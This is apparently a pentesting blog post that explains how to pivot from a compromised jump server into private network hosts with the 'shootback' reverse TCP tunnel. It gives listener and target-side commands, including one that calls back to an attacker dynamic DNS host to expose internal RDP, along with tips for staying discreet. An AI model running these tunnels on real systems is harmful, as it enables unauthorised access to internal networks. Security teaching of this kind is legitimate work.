Good day viewers,
Today i brought another interesting scenario on pentesting servers which are behind NAT or Windows Reverse RDP/SSH in lamen words connecting to windows/linux/xxxxx servers via RDP/SSH/TCP/UDP which are behind NAT.
in r/explainlikeimfive words
Imagine you are auditing / pentesting a server and you found a RCE on the server, unfortunately the server is just a bastion / jump server and there are application servers behind the jump server which are on private network and not exposed to public network. You need to find a way to audit the application servers listening on private network or you want to connect to these servers via SSH / RDP / TCP / UDP. How do we achieve that ? Yes I know there are number of ways to connect to these so let me explain you one way which i found was easy.
I tried many different netcat scenarios routing ports internally connecting via socat etc., without any luck.
I tried to do reverse SSH tunnel using plink, but here we have to expose our ssh username and password on the target pc, which i would never recommend this in pentesting if you want to be discrete.
Finally, I found what i was looking for "a reverse TCP tunnel which let you access target behind NAT or firewall" - shootback
It works fairly simple when you cannot directly connect to private networks directly it will let private networks connect back to you via jumpserver.
Your Machine
Syntax
python3 master.py -m <YOUR IP ADDRESS>:<YOUR_LISTEN_PORT> -c <YOUR IP ADDRESS>:<YOUR_LISTEN_PORT_REDIRECTED_PORT>
Example
python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676
On JumpServer / Target Machine
Syntax
python.exe slaver.py -m <YOUR_PUBLIC_IP or DYNAMIC DNS>:<YOUR_LISTEN_PORT> -t <TARGET_APPLICATION_IP_ADDRESS>:<TARGET_APPLICATION_PORT>
Example
python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389
Once you run the above command you will see the connection being established to your listening machine
Now we see the connection is being forwarded to 7676 port, we should be able to connect to our local ip address on the port 7676
Voila!!! here it is i am connected to the private network behind a load balancer / NAT via jumpserver
Tip: If the target system doesn't have python you can always upload a portable python zip file and extract it, use your creativity.
Disclaimer: This is strictly for educational purposes only, please use this responsibly.
Cheers.
0 comments:
Post a Comment